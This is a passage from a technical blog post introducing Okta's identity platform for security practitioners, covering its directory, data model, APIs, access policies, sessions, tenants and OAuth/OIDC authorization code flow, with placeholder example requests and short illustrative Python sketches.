broader threat landscape. We'll explore historical and potential vulnerabilities to understand their origins and impacts. 
This article will provide insights into:\n\n - Universal Directory (UD)\n - Data Model\n - API Access Management\n - Access Policies\n - Session Management\n - Tenants\n - Authorization Workflows\n - Authentication Workflows.\n\nWith a deeper understanding of Okta, security practitioners may leverage this knowledge to accurately assess attack surfaces where Okta is deployed.\n\n# Okta's offerings\n\n## Overview of core services\n\nIn this introduction, we delve into the core services provided by Okta. Primarily, Okta is a SaaS platform, specializing in scalable Identity and Access Management (IAM) solutions. Central to its offerings are technologies such as Single Sign-On (SSO), Multi-Factor Authentication (MFA), and support for complex multi-tenant architectures. Okta also boasts a robust suite of RESTful APIs, facilitating seamless Create, Read, Update, and Delete (CRUD) operations.\n\nAt the heart of Okta’s IAM solutions lie users, groups, and policies. The platform provides comprehensive lifecycle management and a UD, allowing seamless IAM across hybrid environments encompassing applications, devices, and more. This includes synchronization capabilities with external directories like LDAP or Active Directory (AD), ensuring a unified identity management system.\n\nA key aspect of Okta's service is its dual role as both a Service Provider (SP) and an Identity Provider (IdP). This dual functionality enables Okta to facilitate secure and seamless authentication via its [Identity Engine](https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-index.htm), and robust authorization using standard protocols such as OAuth, while also supporting authentication protocols such as Security Assertion Markup Language (SAML) and OpenID Connect (OIDC).\n\nFor customers, Okta offers valuable tools for security and compliance. 
[System logs](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/), environment-based events that are stored and retrievable via API, provide insights into user activities and organizational events. These logs are crucial for Security Information and Event Management (SIEM) systems, aiding in the detection of anomalies and potential threats.\n\nAdditionally, Okta's [ThreatInsight](https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm) feature stands out as a proactive security measure. It aggregates and analyzes system logs, dynamically identifying and responding to potential threats. This includes recognizing patterns indicative of malicious activities such as password spraying, credential stuffing, and activity from suspicious IP addresses. These features collectively enhance the security posture of organizations, fortifying them against a wide array of cyber threats.\n\n## Integration capabilities\n\nBeyond these many offerings, Okta is also very developer-friendly, integrating with various other SaaS solutions and applications. Out of the box, Okta contains an [integration network](https://www.okta.com/integrations/) that allows seamless integration with other applications such as Slack, Google Workspace, Office 365, GitHub, and many more.\n\nOkta’s [RESTful APIs](https://developer.okta.com/docs/reference/core-okta-api/) follow the System for Cross-domain Identity Management ([SCIM](https://datatracker.ietf.org/doc/html/rfc7644)) protocol. This not only allows straightforward Create, Read, Update, and Delete (CRUD) operations on users and groups by applications or developers, but also enables standardization within the SaaS ecosystem. SCIM is a pivotal component of Okta's scalability. As businesses expand, the need to integrate an increasing number of users, groups, and access controls across various SaaS platforms grows. 
SCIM addresses this challenge by standardizing how user identity data is communicated between these platforms. This standardization facilitates the process of user management, especially in synchronizing user information across different systems.\n\nOkta’s APIs manage objects across several domains, listed below:\n\n - Apps API - Manage applications and their association with users and groups.\n - Users API - Perform CRUD operations on users.\n - Sessions API - Create and manage users’ authentication sessions.\n - Policy API - Create and manage settings such as a user’s session lifetime.\n - Factors API - Enroll, manage, and verify factors for MFA.\n - Devices API - Manage device identities and lifecycles.\n\nWhen integrations are added to an Okta organization, authentication policies, both fine-grained and global, can be set up for access control based on end-user attributes stored within the user’s Okta profile.\n\n# Universal directory\n\nAt the core of Okta’s user, group, policy, and device management is the [UD](https://www.okta.com/products/universal-directory). This is a single-pane view of all assets, whether sourced from Okta, an integration, or a secondary directory service such as AD.\n\nThe UD is technically an Okta-managed, centralized, and cloud-based repository for all user, group, device, and policy profiles. Okta is either the source of truth regarding IAM or synchronizes with other federation services and identity providers such as AD or Google Workspace. The UD is accessible behind Okta’s core APIs for CRUD operations and used in conjunction with their single sign-on (SSO) platform, thus providing authentication and authorization to linked integrations or the admin console itself. 
Everything from user management to streamlined password management is enabled by the UD.\n\nIn short, the UD qualifies as a directory-as-a-service ([DaaS](https://jumpcloud.com/daas-glossary/directory-as-a-service-daas)), similar to AWS Directory Service, Microsoft’s Entra ID, and many more.\n\n## Customization and management\n\nTo add a bit more depth on the UD: profiles are customizable, enabling an organization to store records of information about users and groups with specific attributes. Base attributes are assigned by Okta, but custom attributes can be added as well between user, group, and app [user profiles](https://developer.okta.com/docs/concepts/user-profiles/). Attribute mappings are important for synchronization and data exchanges between integrations and other directory services. For example, the AD attributes givenName and sn can be mapped to firstName and lastName in Okta. Aside from synchronization, this is important for other Okta-related features such as [inline hooks](https://developer.okta.com/docs/concepts/inline-hooks/), directory rules and actions, and more.\n\nAdditionally, this enables rich SAML assertions and [WS-Federation](https://auth0.com/docs/authenticate/protocols/ws-fed-protocol) claims where applications can utilize this information to create rich user accounts, update accounts, or make complex authorization and authentication decisions.\n\nThere are additional [autonomous provisioning and deprovisioning](https://help.okta.com/en-us/content/topics/provisioning/lcm/con-okta-prov.htm) options available as well with the UD and internal profiles, important for scalability and administrative tasks such as controlling which user types can access which applications, thus enabling more traditional role-based access control (RBAC) policies.\n\n## Integration with external directories\n\nAs mentioned previously, the Okta [Directory 
Integration](https://www.okta.com/resources/whitepaper/ad-architecture/) can synchronize with external directories such as LDAP, AD, Google Workspace and others. For cloud-based DaaS platforms, Okta leverages RESTful APIs and the SCIM protocol to perform data exchanges and more. For on-premise environments, Okta has an AD [endpoint agent](https://help.okta.com/en-us/content/topics/directory/ad-agent-new-integration.htm) that can be deployed and thus pulls information from directory services and ships it back to the UD. \n\nAlternatively, Desktop SSO (DSSO) provides an [agentless](https://help.okta.com/en-us/content/topics/directory/configuring_agentless_sso.htm) option as well. This supplies flexibility to cloud, on-premise or hybrid based environments all while continuing scalability and direct integration with 3rd-party applications. Architecturally, this solves the many pitfalls of LAN-based environments, where applications are served to domain users behind a firewall. From a security perspective, credentials and profiles are then synchronized from all application directories into a single “source-of-truth”: Okta. It is much more approachable to audit a single directory as well in an instance where, for example, a disgruntled employee is no longer employed, and thus access across various applications must be deactivated. 
Single Log-Off ([SLO](https://help.okta.com/en-us/content/topics/apps/apps_single_logout.htm)) is thus available for such situations thanks to these external directory integration capabilities.\n\nFinally, we must not overlook the amount of maintenance this potentially reduces for organizations who may not have the resources to manage SAML, OAuth, and SCIM communications between RESTful APIs or compatibility issues between integrations as Okta manages this for them.\n\nAdditional solutions and examples of Okta providers with external directory support for AD can be found [here](https://www.okta.com/resources/whitepaper/ad-architecture/).\n\n# Data model\n\nAs we traverse through the Okta landscape, understanding Okta’s [data models](https://developer.okta.com/docs/concepts/okta-data-model/) is important to security practitioners who may be tasked with threat hunting, detection logic, and more.\n\n## Structure and design\n\nWhen Okta is first established for an organization, it inherits its own “space” where applications, directories, user profiles, authentication policies, and more are housed. A top-level directory resource is given as a “base” for your organization where entities can be sourced from Okta or externally (LDAP, AAD, Google Workspace, etc.).\n\nOkta users are higher-privileged users who typically leverage the Okta [admin console](https://help.okta.com/en-us/content/topics/dashboard/dashboard.htm) and perform administrative tasks, while end users are those who may rely on Okta for SSO, access to applications and more.\n\nBy default, entities in Okta are referred to as resources. Each resource has a combined set of default and custom attributes as discussed before. Links then describe relationships or actions that are acceptable for a resource, such as a deactivation link. This information is then aggregated into a profile which is then accessible from within the UD. 
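As a rough illustration of the profile model described above, a resource's profile combines default and custom attributes, often mapped in from an external directory such as AD. The attribute names below are illustrative assumptions for a sketch, not Okta's exact schema:

```python
# Hypothetical sketch: translating external-directory attribute names onto
# an Okta-style user profile. Names are illustrative, not Okta's schema.
AD_TO_OKTA = {
    "givenName": "firstName",
    "sn": "lastName",
    "mail": "email",
}

def map_profile(ad_attrs: dict) -> dict:
    """Return a profile dict using Okta-style attribute names for any
    AD attributes present in the input."""
    return {okta: ad_attrs[ad] for ad, okta in AD_TO_OKTA.items() if ad in ad_attrs}

profile = map_profile({"givenName": "Ada", "sn": "Lovelace", "mail": "ada@example.com"})
print(profile)
```

In a real deployment this mapping is configured in the admin console rather than in code, but the shape of the exchange is the same: directory attributes in, normalized profile attributes out.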
Groups act less as containers and more as labels applied to a specific set of users.\n\nApplications hold information about policies for access related to users and groups, as well as how to communicate with each integrated application. The data about application access and related users is stored as an [AppUser](https://support.okta.com/help/s/article/The-Okta-User-Profile-And-Application-User-Profile?language=en_US) and, if mapping is done correctly between directories, enables access for end users.\n\nA policy contains a set of conditions and rules that affect how an organization behaves with applications and users. Policies are all-encompassing in Okta, meaning they are used for making decisions and completing actions such as what is required for a password reset or how to enroll in MFA. These rules can be expressed using the Okta Expression Language ([OEL](https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/)).\n\nDedicated [authorization servers](https://developer.okta.com/docs/concepts/auth-servers/) are used per organization to provide authorization codes and tokens for access to applications by API or resources. Here, authorization and authentication protocols such as OAuth, OIDC, and SAML are vital for workflows. These authorization servers are also responsible for communication with third-party IdPs such as Google Workspace. End users who seek access to applications are entangled in communication between authorization servers and SPs as codes and tokens are exchanged rapidly to confirm authorization and authentication.\n\nAltogether, this structure and design support scalability, customization, and seamless integration.\n\n# API access management\n\nAPI access management is not only important for end users, administrators, and developers but also for integration-to-integration communication. 
Remember that at the forefront of Okta are its various RESTful [API endpoints](https://developer.okta.com/docs/reference/core-okta-api/#manage-okta-objects).\n\nWhile we won’t dive deep into the design principles and object management of Okta’s APIs, we will attempt to discuss core concepts that are important for understanding attack surfaces later in this blog series.\n\n## API Security\n\n### OAuth 2.0 and OIDC implementation\n\nUnderstanding the core protocols of [OAuth](https://auth0.com/docs/authenticate/protocols/oauth) and [OIDC](https://auth0.com/docs/authenticate/protocols/openid-connect-protocol) is key before exploring various authorization and authentication workflows. OAuth, an open standard for delegated authorization in RESTful APIs, operates over HTTPS, enabling secure, delegated access using access tokens instead of credentials. These tokens, cryptographically signed by the Identity Provider (IdP), establish a trust relationship, allowing applications to grant user access. The typical OAuth workflow involves user access requests, user authentication, proof-of-authorization code delivery, and token issuance for API requests. Access tokens are verified with the IdP to determine access scope.\n\nOIDC ([API endpoints](https://developer.okta.com/docs/reference/api/oidc/#endpoints)) builds upon OAuth for authentication, introducing identity-focused scopes and an ID token in addition to the access token. This token, a JSON Web Token ([JWT](https://developer.okta.com/blog/2020/12/21/beginners-guide-to-jwt)), contains identity information and a signature, crucial for SSO functionality and user authentication. 
Okta, as a certified OIDC provider, leverages these endpoints, especially when acting as an authorization server for Service Providers (SPs).\n\nDemonstrating Proof-of-Possession ([DPoP](https://developer.okta.com/docs/guides/dpop/main/#oauth-2-0-dpop-jwt-flow)) is crucial in this context, enhancing security by preventing misuse of stolen tokens through an application-level mechanism. It involves a public/private key pair where the public key, embedded in a JWT header, is sent to the authorization server. The server binds this public key to the access token, ensuring secure communication primarily between the user’s browser and the IdP or SP.\n\n[Tokens](https://developer.okta.com/docs/guides/tokens/) and API keys in Okta’s API Access Management play a vital role, acting as digital credentials post-user authentication. They are transmitted securely via HTTPS and have a limited lifespan, contributing to a scalable, stateless architecture.\n\nLastly, understanding End-to-End Encryption (E2EE) is essential. E2EE ensures that data is encrypted at its origin and decrypted only by the intended recipient, maintaining security and privacy across the ecosystem. This encryption, using asymmetric cryptography, is a default feature within Okta’s APIs, safeguarding data across applications, browsers, IdPs, and SPs.\n\n## RESTful API and CRUD\n\nOkta's RESTful API adheres to a standardized interface design, ensuring uniformity and predictability across all interactions. This design philosophy facilitates CRUD (Create, Read, Update, Delete) operations, making it intuitive for developers to work with Okta's API. Each [API endpoint](https://developer.okta.com/docs/reference/core-okta-api/) corresponds to standard HTTP methods — POST for creation, GET for reading, PUT for updating, and DELETE for removing resources. 
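As a sketch of this method-to-operation mapping, the following builds (but does not send) Users API requests with Python's standard library. The org URL and token value are placeholders; the `Authorization: SSWS <token>` header is Okta's API-token scheme:

```python
from urllib.request import Request

BASE = "https://example.okta.com/api/v1"              # placeholder org URL
HEADERS = {"Authorization": "SSWS 00_example_api_token"}  # placeholder token

# CRUD-to-HTTP mapping against the Users API (requests built, never sent):
create = Request(f"{BASE}/users", method="POST", headers=HEADERS,
                 data=b'{"profile": {"login": "ada@example.com"}}')
read   = Request(f"{BASE}/users/ada@example.com", method="GET", headers=HEADERS)
update = Request(f"{BASE}/users/ada@example.com", method="PUT", headers=HEADERS,
                 data=b'{"profile": {"firstName": "Ada"}}')
delete = Request(f"{BASE}/users/ada@example.com", method="DELETE", headers=HEADERS)

for r in (create, read, update, delete):
    print(r.get_method(), r.full_url)
```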
This alignment with HTTP standards simplifies integration and reduces the learning curve for new developers.\n\nA key feature of Okta providing a RESTful API is its statelessness — each request from client to server must contain all the information needed to understand and complete the request, independent of any previous requests. This approach enhances scalability, as it allows the server to quickly free resources and not retain session information between requests. The stateless nature of the API facilitates easier load balancing and redundancy, essential for maintaining high availability and performance even as demand scales.\n\n## SCIM\n\nSCIM (System for Cross-domain Identity Management) is an open standard that automates user identity management across various cloud-based applications and services. Integral to Okta's API Access Management, SCIM ensures seamless, secure user data exchange between Okta and external systems. It standardizes identity information, which is essential for organizations using multiple applications, reducing complexity and manual error risks.\n\nWithin Okta, SCIM’s role extends to comprehensive user and group management, handling essential attributes like usernames, emails, and group memberships. These are key for access control and authorization. Okta’s SCIM implementation is customizable, accommodating the diverse identity management needs of different systems. This adaptability streamlines identity management processes, making them more automated, efficient, and reliable - crucial for effective API access management.\n\nMore information on SCIM can be found in [RFC 7644](https://datatracker.ietf.org/doc/html/rfc7644) or by [Okta](https://developer.okta.com/docs/concepts/scim/#how-does-scim-work).\n\n## Access policies\n\nOkta's [access policies](https://developer.okta.com/docs/concepts/policies/) play a critical role in managing access to applications and APIs. 
They can be customized based on user/group membership, device, location, or time, and can enforce extra authentication steps for sensitive applications. These policies, stored as JSON in Okta, allow for:\n\n - Creating complex authorization rules.\n - Specifying additional authentication levels for Okta applications.\n - Managing user access and modifying access token scopes with inline hooks.\n\nKey policy types in Okta include:\n\n - *Sign-On Policies*: Control app access with IF/THEN rules based on context, like IP address.\n - *Global Session Policy*: Manages access to Okta, including factor challenges and session duration.\n - *Authentication Policy*: Sets extra authentication requirements for each application.\n - *Password Policy*: Defines password requirements and recovery operations.\n - *Authenticator Enrollment Policy*: Governs multifactor authentication method enrollment.\n\nPolicy effectiveness hinges on sequential evaluation: configurations are applied when specified conditions are met. The evaluation varies between the AuthN and Identity Engine pipelines, with the latter considering both global session and specific authentication policies.\n\nAdditionally, [Network Zones](https://help.okta.com/en-us/content/topics/security/network/network-zones.htm) in Okta enhance access control by restricting it based on the source of a user's connection. These zones, allowing for configurations based on IP addresses and geolocations, integrate with access policies to enforce varied authentication requirements based on network origin. This integration bolsters security and aids in monitoring and threat assessment.\n\n# Session management\n\nIn web-based interactions involving Identity Providers (IdPs) like Okta and Service Providers (SPs), the concept of a session is central to the user experience and security framework. 
A session is typically initiated when an end-user starts an interaction with an IdP or SP via a web browser, whether this interaction is intentional or inadvertent.\n\nTechnically, a session represents a state of interaction between the user and the web service. Unlike a single request-response communication, a session persists over time, maintaining the user's state and context across multiple interactions. This persistence is crucial, as it allows the user to interact with web services without needing to authenticate for each action or request after the initial login.\n\nA session can hold a variety of important data, which is essential for maintaining the state and context of the user's interactions. This includes, but is not limited to:\n\n*Cookies*: These are used to store session identifiers and other user-specific information, allowing the web service to recognize the user across different requests.\n\n*Tokens*: Including access, refresh, and ID tokens, these are critical for authenticating and authorizing the user, and for maintaining the security of their interactions with the web service.\n\n*User Preferences and Settings*: Customizations or preferences set by the user during their interaction.\n\n*Session Expiration Data*: Information about when the session will expire or needs to be refreshed. This is vital for security, ensuring that sessions don’t remain active indefinitely, which could pose a security risk.\n\nThe management of sessions, particularly their creation, maintenance, and timely expiration is a crucial aspect of web-based services. Effective session management ensures a balance between user convenience — by reducing the need for repeated logins — and security — by minimizing the risk of unauthorized access through abandoned or excessively long-lived sessions. 
In the interactions between the end-user, IdP, and SP, sessions facilitate a seamless yet secure flow of requests and responses, underpinning the overall security and usability of the service.\n\n### Session initialization and authentication:\n\nOkta manages [user sessions](https://developer.okta.com/docs/concepts/session/) beginning with the IdP session, which is established when a user successfully authenticates using their credentials, and potentially multi-factor authentication (MFA). This IdP session is key to accessing various applications integrated into an organization's Okta environment. For instance, an HTTP POST request to Okta's ```/api/v1/authn``` endpoint initiates this session by validating the user's credentials. In addition, the [Sessions endpoint API](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/) can help facilitate creation and management at ```/api/v1/sessions```.\n\nOkta primarily uses cookies for session management, specifically in the context of identity provider (IdP) sessions. These cookies are crucial for maintaining the session state and user context across HTTP requests within the Okta environment. A typical session cookie retrieval for the end-user’s browser goes as follows:\n\n 1. IdP or SP-initiated application access request\n 2. Authentication request either via OIDC or SAML\n 3. After successful credential validation, a session token is returned\n 4. Redirection to OIDC endpoint, session redirection, or application embed link for session cookie\n\nAs detailed, when a user successfully authenticates, Okta ultimately sets a session cookie in the user’s browser. This cookie is then used to track the user session, allowing for seamless interaction with various applications without the need for re-authentication.\n\n### Tokens vs cookies:\n\nWhile Okta utilizes tokens like ID and access tokens for API access and authorization, these tokens serve a different purpose from session cookies. 
Tokens are typically used in API interactions and are not responsible for maintaining the user’s session state. In contrast, session cookies are specifically designed for maintaining session continuity within the web browser, making them essential for web-based SSO and session management within Okta.\n\nSession tokens are similar to client-side secrets, just like authorization codes during authorization requests. These secrets, along with the correct requests to specific API endpoints, can allow an end-user, or adversary, to obtain a session cookie or access token which can then be used to make authenticated/authorized requests on behalf of the user. This should warrant increased security measures for session management and monitoring.\n\n### Single sign-on (SSO):\n\n[SSO](https://www.okta.com/blog/2021/02/single-sign-on-sso/) is a critical feature in Okta's session management, allowing users to access multiple applications with a single set of credentials. This is achieved through protocols like SAML and OIDC, where an HTTP(S) request to the SAML endpoint, for instance, facilitates user authentication and grants access across different applications without the need for repeated logins.\n\nIn Single Sign-On (SSO) scenarios, Okta’s session cookies play a vital role. Once a user is authenticated and a session is established, the same session cookie facilitates access to multiple applications within the SSO framework by being bundled with every service provider request. This eliminates the need for the user to log in separately to each application, streamlining the user experience.\n\n### Session termination:\n\nTerminating a session in Okta can occur due to expiration. This can also occur from a user, SP, or IdP-initiated sign-out. An HTTP DELETE request to Okta's ```/api/v1/sessions/me``` endpoint can be used to terminate the user’s session. 
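In Okta's Sessions API, closing the caller's current session maps to an HTTP DELETE on ```/api/v1/sessions/me```. A minimal sketch follows, with the request built but never sent, and the org URL and cookie value as placeholders:

```python
from urllib.request import Request

# Sketch only: close the current Okta session (request is not sent here).
end_session = Request(
    "https://example.okta.com/api/v1/sessions/me",  # placeholder org URL
    method="DELETE",
    headers={"Cookie": "sid=abc123"},  # the session cookie identifies the session
)
print(end_session.get_method(), end_session.full_url)
```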
In the case of SSO, this termination can trigger a single logout (SLO), ending sessions across all accessed applications.\n\n### Application sessions and additional controls:\n\nApplication sessions are specific to the application a user accesses post-authentication with the IdP. Okta allows fine-grained control over these sessions, including different expiration policies for privileged versus non-privileged applications. Additionally, administrators can implement policies for single logout ([SLO](https://support.okta.com/help/s/article/What-SLO-does-and-doesnt-do?language=en_US)) or local logout to further manage session lifecycles.\n\nUnderstanding the mechanics of session initiation, management, and termination, as well as the role of tokens and cookies, is foundational for exploring deeper security topics. This knowledge is crucial when delving into areas like attack analysis and session hijacking, which will be discussed in later parts of this blog series.\n\nMore information on sessions can be found in [Session management with Okta](https://developer.okta.com/docs/concepts/session/#application-session) or [Sessions for Developers](https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/).\n\n# Tenants\n\nIn the SaaS realm, a [tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) is a distinct instance of software and infrastructure serving a specific user group. In Okta's [multi-tenant](https://developer.okta.com/docs/concepts/multi-tenancy/) platform, this concept is key for configuring access control. Tenants can represent various groups, from internal employees to external contractors, each requiring unique access to applications. This is managed through Okta, serving as the IdP.\n\nTenants are versatile within Okta: they can be tailored based on security policies, user groups, roles, and profiles, allowing them to operate independently within the organization. 
This independence is crucial in multi-tenant environments, where distinct tenants are segregated based on factors like roles, data privacy, and regulatory requirements. Such setups are common in Okta, enabling users to manage diverse access needs efficiently.\n\nIn multi-org environments, Okta facilitates tenants across separate organizations through its UD. The configuration of each tenant is influenced by various factors including cost, performance, and data residency, with user types and profiles forming the basis of tenant setup. Additionally, features like delegated admin support and DNS customization for post-sign-in redirects are instrumental in managing tenant access.\n\nUnderstanding the nuances of tenant configuration in Okta is vital, not only for effective administration but also for comprehending potential security challenges, such as the risk of [poisoned tenants](https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md).\n\n# Authorization workflow\n\nAs we discussed earlier, Okta - being an IdP - provides an authorization server as part of its services. It is critical to understand the authorization workflow that happens on the front and back-end channels. For this discussion and examples, we will use the client (end-user), authorization server (Okta), and SP (application server) as the actors involved.\n\n## OAuth 2.0 and OIDC protocols\n\n### High-level overview of OAuth\n\nOAuth 2.0, defined in [RFC 6749](https://datatracker.ietf.org/doc/html/rfc6749), is a protocol for authorization. It enables third-party applications to gain limited access approved by the end-user or resource owner. Operating over HTTPS, it grants access tokens to authorize users, devices, APIs, servers, and applications.\n\nKey OAuth terminology:\n\n[Scopes](https://www.oauth.com/oauth2-servers/scope/defining-scopes/): Define the permissions granted within an access token. 
They represent session permissions for each interaction with a resource server.\n\nConsent: A process where end users or clients agree or disagree with the permissions (scopes) requested by a client application. For example, a consent screen in Google Workspace.\n\nTokens: Includes access tokens for resource access and refresh tokens for obtaining new access tokens without re-authorizing.\n\n[Grants](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): Data sent to the authorization server to receive an access token, like an authorization code granted post-authentication.\n\n[Clients](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): In OAuth, clients are either 'confidential', able to securely store credentials, or 'public', which cannot.\n\nAuthorization Server: Mints OIDC and OAuth tokens and applies access policies, each with a unique URI and signing key.\n\n[Authorization Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/authorize) for user interaction and authorization.\n\n[Token Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/token) for clients to obtain access or refresh tokens, typically requiring a grant type like authorization code.\n\nResource Server (or Service Provider, SP): Provides services to authenticated users, requiring an access token.\n\nFront-end Channel: Communication between the user’s browser and the authorization or resource server.\n\nBack-end Channel: Machine-to-machine communication, such as between resource and authorization servers.\n\nThis streamlined overview covers the essentials of OAuth in the Okta ecosystem, 
focusing on its function, key terms, and components.\n\n### High-level overview of OIDC\n\nAt the beginning of this blog, we also discussed how [OIDC](https://openid.net/specs/openid-connect-core-1_0.html) is an identity authentication protocol that sits on top of the OAuth authorization framework. While OAuth provides authorization, it has no mechanism for authentication, which is where the OIDC protocol comes in. The identity of the authenticated user is often called the resource owner.\n\nThe OIDC flow looks similar to the OAuth flow; however, during the initial HTTPS request, ```scope=openid``` is added so that the authorization server returns not only an access token but an ID token as well.\n\nThe ID token is formatted as a JSON Web Token (JWT) so that the client can extract information about the identity. This is unlike the access token, which the client passes to the resource server every time access is required. Data such as expiration, issuer, signature, email, and more can be found inside the JWT - these are also known as claims.\n\n## Authorization code flow\n\n### Step 1 - Initial authorization request:\n\nThe authorization code flow is initiated when the client sends an HTTP GET request to Okta’s authorization endpoint. 
This request is crucial in establishing the initial part of the OAuth 2.0 authorization framework.\n\nHere’s a breakdown of the request components:\n\n - Endpoint: The request is directed to ```/oauth2/default/v1/authorize```, which is Okta’s authorization endpoint.\n - Parameters:\n   - ```response_type=code```: This parameter specifies that the application is initiating an authorization code grant type flow.\n   - ```client_id```: The unique identifier for the client application registered with Okta.\n   - ```redirect_uri```: The URL to which Okta will send the authorization code.\n   - ```scope```: Defines the level of access the application is requesting.\n\nExample Request:\n\n```\nGET /oauth2/default/v1/authorize?response_type=code \\ \n&client_id=CLIENT_ID&redirect_uri=REDIRECT_URI&scope=SCOPE\n```\n\n### Step 2 - User authentication and consent:\n\nOnce the request is made, the user is prompted to authenticate with Okta and give consent for the requested scopes. This step is fundamental for user verification and to ensure that the user is informed about the type of access being granted to the application.\n\n### Step 3 - Authorization code reception:\n\nPost authentication and consent, Okta responds to the client with an authorization code. This code is short-lived and is exchanged for a more permanent secret to make further requests - an access token.\n\nExample token exchange request:\n\n```\nPOST /oauth2/default/v1/token\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=authorization_code&\ncode=AUTHORIZATION_CODE&\nredirect_uri=REDIRECT_URI&\nclient_id=CLIENT_ID&\nclient_secret=CLIENT_SECRET\n```\n\n### Step 4 - Redirect URIs and client authentication\n\nRedirect URIs play a pivotal role in the security of the OAuth 2.0 flow. They are pre-registered URLs to which Okta sends the authorization code. 
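The example authorize and token-exchange requests above can be assembled in Python with the standard library. All values below are placeholders, and the `state` parameter is an addition recommended by RFC 6749 for CSRF protection (it is not shown in the example requests above):

```python
from urllib.parse import urlencode

ORG = "https://example.okta.com"  # placeholder Okta org URL

# Step 1: the authorization request the browser is redirected to.
authorize_url = f"{ORG}/oauth2/default/v1/authorize?" + urlencode({
    "response_type": "code",
    "client_id": "0oa_example_client",
    "redirect_uri": "https://app.example.com/callback",
    "scope": "openid profile",
    "state": "af0ifjsldkj",  # CSRF-protection value, echoed back on redirect
})

# Step 3: the form-encoded body POSTed to the token endpoint.
token_body = urlencode({
    "grant_type": "authorization_code",
    "code": "CODE_FROM_REDIRECT",
    "redirect_uri": "https://app.example.com/callback",
    "client_id": "0oa_example_client",
    "client_secret": "CLIENT_SECRET",
})
print(authorize_url)
```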
The integrity of these URIs is paramount, as they ensure that the response is only sent to the authorized client.\n\nThe client application is authenticated at the token endpoint, usually by providing the ```client_id``` and ```client_secret```. This step is crucial to verify the identity of the client application and prevent unauthorized access.\n\n### Step 5 - Token exchange\n\nIn the final step, the client makes an HTTP POST request to Okta’s token endpoint, exchanging the authorization code for an access token. This access token is then used to make API requests on behalf of the user.\n\nThe inclusion of client credentials (client ID and client secret) in this request is a critical security measure, ensuring that the token is only issued to the legitimate client. \n\n## Access tokens and scopes\n\nAn [access token](https://www.okta.com/identity-101/access-token/) is a compact code carrying extensive data about a user and their permissions. It serves as a digital key, facilitating communication between a server and a user's device. Commonly used in various websites, access tokens enable functionalities like logging in through one website (like Facebook) to access another (like Salesforce).\n\n### Composition of an access token:\n\nAn access token typically comprises three distinct parts, each serving a specific purpose:\n\n - *Header*: This section contains metadata about the token, including the type of token and the algorithm used for signing.\n - *Payload (claims)*: The core of the token, which includes user-related information, permissions, group memberships, and expiration details. The payload dictates whether a user can access a specific resource, depending on the permissions granted within it. Developers can embed custom data in the payload, allowing for versatile applications, such as a single token granting access to multiple APIs.\n - *Signature*: A hashed verification segment that confirms the token's authenticity. 
This makes the token secure and challenging to tamper with or replicate.\n\nA common format for access tokens is the JWT, as we previously discussed, which is concise yet securely encodes all necessary information.\n\n### Scopes and permissions:\n\n[Scopes](https://developer.okta.com/docs/api/oauth2/) in OAuth 2.0 are parameters that define the level and type of access the client requests. Each scope translates into specific permissions granted to the access token. For instance, a scope of email would grant the client application access to the user's email address. The granularity of scopes allows for precise control over what the client can and cannot do with the access token, adhering to the principle of least privilege.\n\n### Token lifespan and refresh tokens:\n\nAccess tokens are inherently short-lived for security reasons, reducing the window of opportunity for token misuse in case of unintended disclosure. Okta allows customization of [token lifespans](https://support.okta.com/help/s/article/What-is-the-lifetime-of-the-JWT-tokens?language=en_US#:~:text=ID%20Token%3A%2060%20minutes,Refresh%20Token%3A%2090%20days) to suit different security postures. Once an access token expires, it can no longer be used to access resources.\n\n[Refresh tokens](https://developer.okta.com/docs/guides/refresh-tokens/main/), where employed, serve to extend the session without requiring the user to authenticate again. A refresh token can be exchanged for a new access token, thus maintaining the user's access continuity to the application. The use of refresh tokens is pivotal in applications where the user remains logged in for extended periods.\n\n### Token storage:\n\nRegarding [token storage](https://auth0.com/docs/secure/security-guidance/data-security/token-storage), for browser-based applications such as those utilizing services like Okta, secure storage of access tokens is a critical aspect of user session management. 
These tokens are typically stored using one of several methods: browser in-memory storage, session cookies, or browser local/session storage. In-memory storage, preferred for its strong defense against XSS attacks, holds the token within the JavaScript memory space of the application, although it loses the token upon page refresh or closure. Session cookies offer enhanced security by being inaccessible to JavaScript, thereby reducing XSS vulnerabilities, but require careful implementation to avoid CSRF attacks. Local and session storage options, while convenient, are generally less recommended for sensitive data like access tokens due to their susceptibility to XSS attacks. The choice of storage method will depend on whether the application is a traditional web page, a mobile app, or a single-page app.\n\n### Security and expiration:\n\nThe security of access tokens is of paramount importance in safeguarding user authentication and authorization processes, especially during their transmission over the internet. Encrypting these tokens is crucial, as it ensures that their contents remain confidential and impervious to unauthorized access. Equally important is the use of secure communication channels, notably HTTPS, to prevent the interception and compromise of tokens in transit. Furthermore, the signature component of a token, particularly in JWTs, plays a vital role in verifying its authenticity and integrity. This signature confirms that the token has not been altered and is genuinely issued by a trusted authority, thus preventing the risks associated with token forgery and replay attacks.\n\nAccess tokens are inherently designed with expiration mechanisms, a strategic choice to mitigate the risks associated with token theft or misuse. This finite lifespan of tokens necessitates regular renewal, typically managed through refresh tokens, thereby ensuring active session management and reducing opportunities for unauthorized use. 
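To make the three-part token structure and expiration claims discussed above concrete, here is a minimal sketch that splits a JWT and decodes its payload without verifying it (illustrative only, with a fabricated token; production code must verify the signature with a vetted library such as PyJWT before trusting any claim):

```python
import base64
import json
import time

def decode_jwt_payload(token: str) -> dict:
    """Split a JWT into header.payload.signature and decode the payload (claims)."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    # base64url-encoded segments may omit padding; restore it before decoding
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

def is_expired(claims: dict) -> bool:
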